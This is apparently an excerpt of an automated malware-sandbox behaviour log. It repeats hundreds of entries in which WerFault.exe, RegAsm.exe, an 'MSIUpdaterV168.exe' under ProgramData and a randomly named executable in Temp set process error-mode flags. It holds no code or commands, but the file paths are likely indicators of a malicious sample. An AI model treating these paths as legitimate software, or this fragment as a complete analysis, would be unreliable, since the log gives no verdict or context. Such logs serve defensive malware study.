Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process information set: NOOPENFILEERRORBOX
